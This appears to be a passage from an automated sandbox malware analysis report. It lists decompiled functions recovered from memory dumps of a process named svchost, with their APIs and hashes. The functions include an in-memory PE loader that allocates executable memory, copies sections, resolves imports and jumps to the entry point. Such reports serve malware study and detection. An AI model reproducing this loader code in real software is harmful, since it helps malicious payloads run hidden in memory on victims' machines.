                                                                                                                                                                                                                                                    • Instruction ID: 7140d396e4fa338b1c45032ebff5f33e510887e1da457bfc48643044175dbf3e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80012234A00348FBEF14CFA8D845BEE77B4AB44318F10C658E9656B2C0D7B6A651EB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 323 40013b0-40013c1 324 4001421-4001427 323->324 325 40013c3-40013c7 323->325 325->324 326 40013c9-40013d0 325->326 327 40013db-40013e1 326->327 328 4001411-400141a 327->328 329 40013e3-400140f QueryPerformanceCounter Sleep 327->329 328->324 330 40013d2-40013d8 329->330 330->327
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E040013B0(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                    				union _LARGE_INTEGER _v20;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					while(_v12 < _a8) {
                                                                                                                                                                                                                                                    						QueryPerformanceCounter( &_v20);
                                                                                                                                                                                                                                                    						Sleep(0); // executed
                                                                                                                                                                                                                                                    						_t17 = _v20.LowPart % 0x3d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz1234567890"; // 0x44434241
                                                                                                                                                                                                                                                    						 *((char*)(_a4 + _v12)) =  *_t17;
                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((char*)(_a4 + _a8)) = 0;
                                                                                                                                                                                                                                                    					_v8 = 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x040013b6
                                                                                                                                                                                                                                                    0x040013c1
                                                                                                                                                                                                                                                    0x040013c9
                                                                                                                                                                                                                                                    0x040013db
                                                                                                                                                                                                                                                    0x040013e7
                                                                                                                                                                                                                                                    0x040013ef
                                                                                                                                                                                                                                                    0x04001407
                                                                                                                                                                                                                                                    0x0400140d
                                                                                                                                                                                                                                                    0x040013d8
                                                                                                                                                                                                                                                    0x040013d8
                                                                                                                                                                                                                                                    0x04001417
                                                                                                                                                                                                                                                    0x0400141a
                                                                                                                                                                                                                                                    0x0400141a
                                                                                                                                                                                                                                                    0x04001427

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                                                    • Opcode ID: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                    • Instruction ID: 9d74403c1c2c7bb1751bbbba9dc0b5917814bf527727232baae25755bbc2d242
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18011A30904208EBEB01CF98D494BEDBBB1FF44308F14C098E9496B381D379AA84CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 331 4011cd-4011e4 332 401253-401255 331->332 333 4011e6-4011e9 331->333 334 4011ea-4011ef 333->334 335 4011f1-401204 LoadLibraryExA 334->335 336 40124a-40124f 334->336 335->332 337 401206-40120d 335->337 336->332 338 401212-401218 337->338 339 40120f 337->339 340 40121b-40121f 338->340 339->338 341 401221-401224 340->341 342 401226-40122b 340->342 341->334 343 401235 342->343 344 40122d-401233 342->344 345 40123a-401248 343->345 344->345 345->340
                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                    			E004011CD(intOrPtr _a4, intOrPtr _a8, signed int _a16) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                                    				intOrPtr* _t34;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				asm("pushad");
                                                                                                                                                                                                                                                    				_t33 =  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_a4 + 0x3c)) + 0x80));
                                                                                                                                                                                                                                                    				if(_t33 != 0) {
                                                                                                                                                                                                                                                    					_t34 = _t33 + _a4;
                                                                                                                                                                                                                                                    					asm("cld");
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t23 =  *((intOrPtr*)(_t34 + 0xc));
                                                                                                                                                                                                                                                    						if(_t23 == 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t22 = LoadLibraryExA(_t23 + _a4, 0, 0);
                                                                                                                                                                                                                                                    						if(_t22 != 0) {
                                                                                                                                                                                                                                                    							_v8 = _t22;
                                                                                                                                                                                                                                                    							if( *_t34 == 0) {
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                    								asm("lodsd");
                                                                                                                                                                                                                                                    								if(_t22 == 0) {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if((_t22 & 0x80000000) != 0) {
                                                                                                                                                                                                                                                    									_t26 = _t22 & 0x0000ffff;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t26 = _t22 + _a4 + 2;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t22 =  *((intOrPtr*)(_a8 + 0x29af9))(_v8, _t26);
                                                                                                                                                                                                                                                    								asm("stosd");
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t34 = _t34 + 0x14;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t22 = 1;
                                                                                                                                                                                                                                                    					_a16 = 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L14:
                                                                                                                                                                                                                                                    				asm("popad");
                                                                                                                                                                                                                                                    				return _t22;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x004011d3
                                                                                                                                                                                                                                                    0x004011e0
                                                                                                                                                                                                                                                    0x004011e4
                                                                                                                                                                                                                                                    0x004011e6
                                                                                                                                                                                                                                                    0x004011e9
                                                                                                                                                                                                                                                    0x004011ea
                                                                                                                                                                                                                                                    0x004011ea
                                                                                                                                                                                                                                                    0x004011ef
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x004011fc
                                                                                                                                                                                                                                                    0x00401204
                                                                                                                                                                                                                                                    0x00401206
                                                                                                                                                                                                                                                    0x0040120d
                                                                                                                                                                                                                                                    0x0040120d
                                                                                                                                                                                                                                                    0x0040121b
                                                                                                                                                                                                                                                    0x0040121b
                                                                                                                                                                                                                                                    0x0040121f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0040122b
                                                                                                                                                                                                                                                    0x00401235
                                                                                                                                                                                                                                                    0x0040122d
                                                                                                                                                                                                                                                    0x00401230
                                                                                                                                                                                                                                                    0x00401230
                                                                                                                                                                                                                                                    0x00401241
                                                                                                                                                                                                                                                    0x00401247
                                                                                                                                                                                                                                                    0x00401247
                                                                                                                                                                                                                                                    0x00401221
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00401221
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00401204
                                                                                                                                                                                                                                                    0x0040124a
                                                                                                                                                                                                                                                    0x0040124f
                                                                                                                                                                                                                                                    0x0040124f
                                                                                                                                                                                                                                                    0x00401253
                                                                                                                                                                                                                                                    0x00401253
                                                                                                                                                                                                                                                    0x00401255

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004011FC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.858573370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                    • Instruction ID: 35013e2e2bdfb2c25cf3a4b33a37da36620c85c937569e224cb1d264aff8bf43
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5114872944205AFDF10CF44C8C0B9A37A4AF15354F2981B9EC19FB3A2D374EE148B99
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                                                                                                                                    			E00401126(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				asm("pushad");
                                                                                                                                                                                                                                                    				_t55 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                    				_t27 = VirtualAlloc( *(_t55 + 0x34),  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                                    					_v8 = _t27;
                                                                                                                                                                                                                                                    					asm("cld");
                                                                                                                                                                                                                                                    					memcpy(_v8, _a4,  *(_t55 + 0x54));
                                                                                                                                                                                                                                                    					_t57 = _t55;
                                                                                                                                                                                                                                                    					_push(_t57);
                                                                                                                                                                                                                                                    					_t58 = _t57 + 0xf8;
                                                                                                                                                                                                                                                    					asm("pushad");
                                                                                                                                                                                                                                                    					asm("cld");
                                                                                                                                                                                                                                                    					memcpy(_v8 +  *((intOrPtr*)(_t57 + 0x104)), _a4 +  *((intOrPtr*)(_t57 + 0x10c)),  *(_t58 + 0x10));
                                                                                                                                                                                                                                                    					asm("popad");
                                                                                                                                                                                                                                                    					asm("loop 0xffffffe5");
                                                                                                                                                                                                                                                    					_pop(_t61);
                                                                                                                                                                                                                                                    					E004011CD(_v8, _a8); // executed
                                                                                                                                                                                                                                                    					E00401258();
                                                                                                                                                                                                                                                    					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x28)) + _v8))(_v8); // executed
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t27 =  *((intOrPtr*)(_a8 + 0x29afd))(0,  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				asm("popad");
                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x0040112c
                                                                                                                                                                                                                                                    0x00401130
                                                                                                                                                                                                                                                    0x00401144
                                                                                                                                                                                                                                                    0x0040114c
                                                                                                                                                                                                                                                    0x0040116b
                                                                                                                                                                                                                                                    0x0040116b
                                                                                                                                                                                                                                                    0x0040116e
                                                                                                                                                                                                                                                    0x0040117b
                                                                                                                                                                                                                                                    0x0040117d
                                                                                                                                                                                                                                                    0x0040117e
                                                                                                                                                                                                                                                    0x00401185
                                                                                                                                                                                                                                                    0x00401197
                                                                                                                                                                                                                                                    0x0040119f
                                                                                                                                                                                                                                                    0x004011a0
                                                                                                                                                                                                                                                    0x004011a2
                                                                                                                                                                                                                                                    0x004011a6
                                                                                                                                                                                                                                                    0x004011a8
                                                                                                                                                                                                                                                    0x004011af
                                                                                                                                                                                                                                                    0x004011b7
                                                                                                                                                                                                                                                    0x004011c6
                                                                                                                                                                                                                                                    0x0040114e
                                                                                                                                                                                                                                                    0x00401163
                                                                                                                                                                                                                                                    0x00401167
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00401169
                                                                                                                                                                                                                                                    0x00401167
                                                                                                                                                                                                                                                    0x004011c8
                                                                                                                                                                                                                                                    0x004011ca

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.858573370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                    • Instruction ID: 6f389262607e94f6ca6fd2432eff30f66c048e0178ed9f8f27be01fdfe11bbb9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02115E32600615ABCB21DF64CD81B8BB7F4AF09324F144469AA1ABB691D771FA00DB88
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E04016CD0(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a8;
                                                                                                                                                                                                                                                    				_v12 = _a12;
                                                                                                                                                                                                                                                    				_t117 = _v12;
                                                                                                                                                                                                                                                    				E04007010(__edi, _v8, 0, _v12);
                                                                                                                                                                                                                                                    				if(_a4 != 1) {
                                                                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                                                                    						if(_a4 != 2) {
                                                                                                                                                                                                                                                    							if(_a4 != 3) {
                                                                                                                                                                                                                                                    								if(_a4 != 4) {
                                                                                                                                                                                                                                                    									if(_a4 != 5) {
                                                                                                                                                                                                                                                    										if(_a4 != 6) {
                                                                                                                                                                                                                                                    											if(_a4 != 7) {
                                                                                                                                                                                                                                                    												if(_a4 != 8) {
                                                                                                                                                                                                                                                    													if(_a4 != 0x10) {
                                                                                                                                                                                                                                                    														if(_a4 != 9) {
                                                                                                                                                                                                                                                    															if(_a4 != 0xa) {
                                                                                                                                                                                                                                                    																if(_a4 != 0xb) {
                                                                                                                                                                                                                                                    																	if(_a4 != 0xc) {
                                                                                                                                                                                                                                                    																		if(_a4 != 0xd) {
                                                                                                                                                                                                                                                    																			if(_a4 != 0xe) {
                                                                                                                                                                                                                                                    																				if(_a4 != 0xf) {
                                                                                                                                                                                                                                                    																					if(_a4 != 0x12) {
                                                                                                                                                                                                                                                    																						if(_a4 != 0x11) {
                                                                                                                                                                                                                                                    																							return E04008B48(_t117, _v8, _v12, 0x4273f8);
                                                                                                                                                                                                                                                    																						}
                                                                                                                                                                                                                                                    																						return E04008B48(_v8, _v8, _v12, 0x4273f0);
                                                                                                                                                                                                                                                    																					}
                                                                                                                                                                                                                                                    																					return E04008B48(_v12, _v8, _v12, 0x4273e8);
                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                    																				return E04008B48(_t117, _v8, _v12, 0x4273d8);
                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                    																			return E04008B48(_v8, _v8, _v12, 0x4273c8);
                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                    																		return E04008B48(_v12, _v8, _v12, 0x4273b4);
                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                    																	return E04008B48(_t117, _v8, _v12, 0x42739c);
                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                    																return E04008B48(_v8, _v8, _v12, 0x427384);
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															return E04008B48(_v12, _v8, _v12, 0x427374);
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														return E04008B48(_t117, _v8, _v12, 0x42736c);
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													return E04008B48(_v8, _v8, _v12, 0x427360);
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												return E04008B48(_v12, _v8, _v12, 0x427358);
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											return E04008B48(_t117, _v8, _v12, 0x42734c);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										return E04008B48(_v8, _v8, _v12, 0x427344);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									return E04008B48(_v12, _v8, _v12, 0x427338);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								return E04008B48(_t117, _v8, _v12, 0x427328);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							return E04008B48(_v8, _v8, _v12, 0x42731c);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return E04008B48(_v12, _v8, _v12, 0x427310);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return E04008B48(_t117, _v8, _v12, 0x427300);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return E04008B48(_v8, _v8, _v12, 0x4272f4);
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x04016cd9
                                                                                                                                                                                                                                                    0x04016cdf
                                                                                                                                                                                                                                                    0x04016ce2
                                                                                                                                                                                                                                                    0x04016cec
                                                                                                                                                                                                                                                    0x04016cf8
                                                                                                                                                                                                                                                    0x04016d18
                                                                                                                                                                                                                                                    0x04016d38
                                                                                                                                                                                                                                                    0x04016d58
                                                                                                                                                                                                                                                    0x04016d78
                                                                                                                                                                                                                                                    0x04016d98
                                                                                                                                                                                                                                                    0x04016db8
                                                                                                                                                                                                                                                    0x04016dd8
                                                                                                                                                                                                                                                    0x04016df8
                                                                                                                                                                                                                                                    0x04016e18
                                                                                                                                                                                                                                                    0x04016e38
                                                                                                                                                                                                                                                    0x04016e58
                                                                                                                                                                                                                                                    0x04016e78
                                                                                                                                                                                                                                                    0x04016e98
                                                                                                                                                                                                                                                    0x04016eb8
                                                                                                                                                                                                                                                    0x04016ed8
                                                                                                                                                                                                                                                    0x04016ef5
                                                                                                                                                                                                                                                    0x04016f12
                                                                                                                                                                                                                                                    0x04016f2f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016f5a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016f43
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016f26
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016f09
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016eec
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016ecc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016eac
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016e8c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016e6c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016e4c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016e2c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016e0c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016dec
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016dcc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016dac
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016d8c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016d6c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016d4c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04016d2c
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strcpy_s$_memset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 987253425-0
                                                                                                                                                                                                                                                    • Opcode ID: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                    • Instruction ID: 6ffbbe254bd13291fa03b93f874eca1d4a54b98d90e1905f46e8f856855b0833
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC7172B6E04208FBDF50DF94EC818DEB7B4AB4A609F20C459F90976290D135BA48EB56
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                    			E040137A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				char _v30;
                                                                                                                                                                                                                                                    				short _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                    				short _v44;
                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				char _v74;
                                                                                                                                                                                                                                                    				short _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                                                    				char _v96;
                                                                                                                                                                                                                                                    				intOrPtr _v100;
                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                                                                                                    				intOrPtr _v112;
                                                                                                                                                                                                                                                    				intOrPtr _v116;
                                                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                                                                                                                    				intOrPtr _v136;
                                                                                                                                                                                                                                                    				intOrPtr _v140;
                                                                                                                                                                                                                                                    				intOrPtr _v144;
                                                                                                                                                                                                                                                    				intOrPtr* _v148;
                                                                                                                                                                                                                                                    				intOrPtr _v152;
                                                                                                                                                                                                                                                    				intOrPtr _v156;
                                                                                                                                                                                                                                                    				intOrPtr _v160;
                                                                                                                                                                                                                                                    				intOrPtr _v164;
                                                                                                                                                                                                                                                    				void* _t211;
                                                                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                                                                    				void* _t215;
                                                                                                                                                                                                                                                    				signed int _t220;
                                                                                                                                                                                                                                                    				intOrPtr _t226;
                                                                                                                                                                                                                                                    				intOrPtr _t228;
                                                                                                                                                                                                                                                    				intOrPtr _t251;
                                                                                                                                                                                                                                                    				void* _t253;
                                                                                                                                                                                                                                                    				intOrPtr _t258;
                                                                                                                                                                                                                                                    				void* _t261;
                                                                                                                                                                                                                                                    				intOrPtr _t266;
                                                                                                                                                                                                                                                    				void* _t269;
                                                                                                                                                                                                                                                    				signed int _t275;
                                                                                                                                                                                                                                                    				void* _t277;
                                                                                                                                                                                                                                                    				intOrPtr _t370;
                                                                                                                                                                                                                                                    				void* _t373;
                                                                                                                                                                                                                                                    				void* _t374;
                                                                                                                                                                                                                                                    				signed int _t375;
                                                                                                                                                                                                                                                    				void* _t376;
                                                                                                                                                                                                                                                    				void* _t377;
                                                                                                                                                                                                                                                    				void* _t378;
                                                                                                                                                                                                                                                    				void* _t379;
                                                                                                                                                                                                                                                    				void* _t380;
                                                                                                                                                                                                                                                    				void* _t382;
                                                                                                                                                                                                                                                    				void* _t384;
                                                                                                                                                                                                                                                    				void* _t385;
                                                                                                                                                                                                                                                    				void* _t386;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t374 = __esi;
                                                                                                                                                                                                                                                    				_t373 = __edi;
                                                                                                                                                                                                                                                    				_t277 = __ebx;
                                                                                                                                                                                                                                                    				_v16 =  *0x429024 ^ _t375;
                                                                                                                                                                                                                                                    				_v148 = __ecx;
                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                    				_v8 = 0x48;
                                                                                                                                                                                                                                                    				_v48 =  *0x426ec4;
                                                                                                                                                                                                                                                    				_v44 =  *0x426ec8;
                                                                                                                                                                                                                                                    				_v28 =  *0x426ecc;
                                                                                                                                                                                                                                                    				_v24 =  *0x426ed0;
                                                                                                                                                                                                                                                    				_v20 =  *0x426ed4;
                                                                                                                                                                                                                                                    				_v40 =  *0x426ed8;
                                                                                                                                                                                                                                                    				_v36 =  *0x426edc;
                                                                                                                                                                                                                                                    				_v32 =  *0x426ee0;
                                                                                                                                                                                                                                                    				_v30 =  *0x426ee2;
                                                                                                                                                                                                                                                    				while(_a4 != 0) {
                                                                                                                                                                                                                                                    					_v52 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                    					if(_v52 < 0) {
                                                                                                                                                                                                                                                    						_v52 = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *_v148 + 0x2c)) > _v52) {
